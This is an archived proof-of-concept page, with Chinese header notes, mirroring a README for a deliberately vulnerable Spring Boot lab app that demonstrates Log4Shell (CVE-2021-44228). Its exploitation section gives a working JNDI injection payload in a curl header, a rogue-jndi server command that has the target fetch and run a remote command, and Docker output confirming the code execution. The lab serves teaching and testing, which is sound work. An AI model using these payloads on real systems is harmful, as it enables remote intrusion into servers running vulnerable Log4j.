POC详情: 0b048a3721260bfe1cb15a012df4fdd2ab1851b1

来源
https://github.com/0xst4n/CVE-2021-44228-poc
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
log4shell sample application (CVE-2021-44228)
介绍
# Log4Shell sample vulnerable application (CVE-2021-44228)

This is an almost copy/similar vulnerable application to https://github.com/christophetd/log4shell-vulnerable-app

The main differences are maven instead of gradle, and the usage of rogue-jndi.

This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).

It uses Log4j 2.6.1 and JDK version 1.8.0_181.

## Running the springboot application

Build and run the docker springboot application:

```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app
```

## Exploitation
1. `git clone https://github.com/veracode-research/rogue-jndi`
2. `cd rogue-jndi`
3. `mvn package`
4. `java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"`

Open a second terminal

5. `curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'`

Where in both cases 192.168.1.x is your IP

`NOTE: don't use localhost, use your actual private IP address.
`

Now check if RCE was succesful:
```sh
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
```

```sh
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507
```

As you can see, the file `test_if_rce` exists. Which means RCE was succesful.

## NOTE

Code and ideas have been used from the following repositories:

- https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

- https://www.lunasec.io/docs/blog/log4j-zero-day/

- https://github.com/christophetd/log4shell-vulnerable-app
文件快照

 [4.0K]  /data/pocs/0b048a3721260bfe1cb15a012df4fdd2ab1851b1
├── [ 288]  Dockerfile
├── [9.8K]  mvnw
├── [6.5K]  mvnw.cmd
├── [1.7K]  pom.xml
├── [2.0K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  demo
        │               ├── [ 305]  DemoApplication.java
        │               └── [ 633]  MainController.java
        └── [4.0K]  resources
            └── [   1]  application.properties

7 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。